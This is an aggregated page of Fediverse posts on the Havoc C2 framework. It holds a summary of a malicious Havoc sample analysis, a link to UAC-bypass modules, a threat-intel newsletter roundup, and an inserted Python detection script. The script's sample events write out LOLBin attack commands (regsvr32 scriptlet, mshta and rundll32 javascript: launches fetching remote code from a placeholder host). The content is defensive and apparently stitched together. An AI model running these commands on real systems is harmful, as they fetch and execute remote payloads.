#havocc2 — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #havocc2, aggregated by home.social.
-
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sample
TL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
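The blue-team TL;DR above (monitor regsvr32, rundll32 and mshta; prefer behavioural over file-based detection) can be turned into a first-pass triage rule. The following is an added example, not code from the post or from FortiGuard Labs: it scores process-creation events (constructed, Sysmon-style dicts with Image, CommandLine and ParentImage fields; the URLs, paths and parent names are made up) and reports LOLBin launches that carry a remote URL, a script: scheme, the regsvr32 scriptlet handler, or an Office parent. The benign events in the sample show why the image name alone is too noisy to alert on.

```python
"""Triage Windows process-creation events for suspicious LOLBin use.

Constructed example: the event shape loosely follows Sysmon Event ID 1
fields (Image, CommandLine, ParentImage) as plain dicts; no real logs.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Living-off-the-land binaries the post says to monitor.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe"}
# Parents from which these binaries are rarely launched legitimately.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_SCHEME = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)


@dataclass
class Finding:
    image: str
    parent: str
    command_line: str
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: dict) -> Optional[Finding]:
    """Return a Finding if the event is a LOLBin launch with suspicious traits."""
    image = basename(event["Image"])
    if image not in LOLBINS:
        return None
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    reasons = []
    if REMOTE_URL.search(cmd):
        reasons.append("remote URL in command line")
    if SCRIPT_SCHEME.search(cmd):
        reasons.append("script: scheme in command line")
    if image == "regsvr32.exe" and "scrobj.dll" in cmd.lower():
        reasons.append("regsvr32 invoked with the scriptlet handler")
    if parent in OFFICE_PARENTS:
        reasons.append("spawned by Office application")
    if not reasons:
        return None
    return Finding(image, parent, cmd, reasons)


def triage(events) -> list:
    """Run assess() over a batch of events and keep only the findings."""
    return [f for f in (assess(e) for e in events) if f]


# Constructed sample batch: three suspicious launches, two benign ones.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /u /i:https://files.example.invalid/update.sct scrobj.dll",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"sample-script-payload"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://files.example.invalid/page.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign: a vendor installer registering its own COM DLL from disk.
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendorlib.dll"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    # Benign: Control Panel applet launched from the shell.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.image} <- {f.parent}: {', '.join(f.reasons)}")
```

The rule is deliberately a triage aid rather than a blocking signature: it surfaces the three suspicious events and stays quiet on the installer and Control Panel launches, and it pairs naturally with the memory and thread-creation checks the post recommends for confirming what the spawned process actually did.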
-
https://github.com/icyguider/UAC-BOF-Bonanza
"This repository serves as a collection of public UAC bypass techniques that have been weaponized as BOFs. A single module which integrates all techniques has been provided to use the BOFs via the Havoc C2 Framework. An extension.json file has also been provided for each bypass technique for use in Sliver."
#hacking #pentesting #redteam #sliverc2 #sliver #BOF #Havoc #havocC2
-
Death by a thousand PaperCuts, China's APT41 uses new tricks to skirt EDR, and a pair of no-patch vulnerabilities take the front page in this week's newsletter:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-01052023-07052023
The #PaperCut vulnerability continues to garner interest, with Iran's Mint SandStorm (formerly #PHOSPHORUS) and Mango SandStorm (formerly #MERCURY) seen using it opportunistically. A completely new exploit chain demo'd by Vulncheck researchers highlights the limitations of detection rules for assurances, and why patching is a must.
Earth Longzhi - a subset of the Chinese #APT41 Threat Group - has emerged after months in the shadows with new techniques seen in recent campaigns. Using Windows #Defender to side-load malware, the BYOVD technique to kill #EDR processes, and a newly discovered technique called "stack rumbling" to ensure they can't recover - this one is definitely one to check out.
Fortinet have warned of a recent wave of exploitation of a 5-year-old vulnerability with no patches being exploited en masse in late April, while #Cisco reveal a CVSS 9.8 vulnerability they have no plans to patch in their End-of-Support #VoIP phone adapters.
There's a bunch of great write-ups for those in the #redteam, looking at bypassing WAF protections by running tools like SQLMap over #Tor, how to minimise the size of your #XSS payloads, and highlighting a bunch of lab/ctf-style environments to cut your teeth on Azure, AWS, Kubernetes, and more.
The #blueteam can brush up on commonly abused misconfigurations in Active Directory, #AzureAD, and #Microsoft365, as well as some excellent tips on hunting the Open Source Posh, Deimos, and Havoc C2 frameworks using #Shodan and #Censys.
Elastic Labs have also outdone themselves last week, releasing a suite of tools to decrypt, decompress, recompile, extract and/or parse various malware payloads distributed in recent #IcedID campaigns.
There's lots to dig through before starting your work week, so get started here:
https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-01052023-07052023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #exploitation #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #MangoSandstorm #MintSandstorm #Iran #EarthLongzhi #StackRumbling #clop #PoC #exploit #securityresearch #BYOVD #AWS #Azure #Kubernetes #GCP #PoshC2 #DeimosC2 #HavocC2